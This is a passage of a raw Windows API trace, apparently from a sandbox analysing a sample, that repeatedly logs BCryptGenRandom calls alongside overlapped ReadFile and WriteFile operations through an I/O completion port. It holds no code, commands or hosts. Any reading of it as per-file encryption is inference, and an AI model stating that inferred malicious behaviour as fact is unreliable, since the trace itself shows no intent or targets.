lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0138.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0138.670] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.670] free (_Block=0x3e305b8) [0138.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.670] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.671] free (_Block=0x1fa91d0) [0138.671] free (_Block=0x77d7a8) [0138.671] free (_Block=0x1fa90b8) [0138.671] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.683] CloseHandle (hObject=0x338) returned 1 [0138.683] free (_Block=0x3df0008) [0138.683] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.686] CloseHandle (hObject=0x3cc) returned 1 [0138.691] free (_Block=0x1ff1e60) [0138.691] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.697] CloseHandle (hObject=0xec) returned 1 [0138.698] free (_Block=0x3e70008) [0138.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.702] CloseHandle (hObject=0x170) returned 1 [0138.702] free (_Block=0x3ef0008) [0138.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0138.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0138.714] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.714] free (_Block=0x3e305b8) [0138.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.714] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.715] free (_Block=0x1fa91d0) [0138.715] free (_Block=0x77d7a8) [0138.715] free (_Block=0x1fa90b8) [0138.715] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0138.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0138.724] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.724] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.724] free (_Block=0x3e305b8) [0138.724] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.724] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.724] free (_Block=0x1fa91d0) [0138.724] free (_Block=0x77d7a8) [0138.724] free (_Block=0x1fa90b8) [0138.724] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.733] CloseHandle (hObject=0xec) returned 1 [0138.733] free (_Block=0x3df0008) [0138.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.743] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x290c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.756] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.845] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.883] CloseHandle (hObject=0x338) returned 1 [0138.883] free (_Block=0x1ff1e60) [0138.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.891] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.902] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.912] CloseHandle (hObject=0x308) returned 1 [0138.912] free (_Block=0x3e70008) [0138.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.922] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x24b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.545] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.558] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.558] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.558] free (_Block=0x3e305b8) [0141.558] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.558] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.559] free (_Block=0x1fa91d0) [0141.559] free (_Block=0x77d7a8) [0141.559] free (_Block=0x1fa90b8) [0141.559] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0141.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.676] CloseHandle (hObject=0xec) returned 1 [0141.676] free (_Block=0x1ff1e60) [0141.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.678] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.678] free (_Block=0x3e305b8) [0141.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.678] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.679] free (_Block=0x1fa91d0) [0141.679] free (_Block=0x77d7a8) [0141.679] free (_Block=0x1fa90b8) [0141.679] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0141.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.680] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0141.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.683] CloseHandle (hObject=0x338) returned 1 [0141.683] free (_Block=0x3d70450) [0141.683] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.692] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.692] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.692] free (_Block=0x3e305b8) [0141.692] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.692] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.692] free (_Block=0x1fa91d0) [0141.692] free (_Block=0x77d7a8) [0141.692] free (_Block=0x1fa90b8) [0141.692] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.693] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.694] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.715] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.731] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5c78, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.732] CloseHandle (hObject=0x338) returned 1 [0141.732] free (_Block=0x3df0008) [0141.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.739] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.740] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.740] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.740] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.740] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.740] free (_Block=0x3e305b8) [0141.741] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.741] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.741] free (_Block=0x1fa91d0) [0141.741] free (_Block=0x77d7a8) [0141.741] free (_Block=0x1fa90b8) [0141.741] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.742] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.752] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.762] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2ce4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.788] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7680, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.814] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1338, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.817] CloseHandle (hObject=0x338) returned 1 [0141.818] free (_Block=0x3df0008) [0141.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.844] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.844] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.844] free (_Block=0x3e305b8) [0141.844] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.844] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.844] free (_Block=0x1fa91d0) [0141.844] free (_Block=0x77d7a8) [0141.844] free (_Block=0x1fa90b8) [0141.844] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.846] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 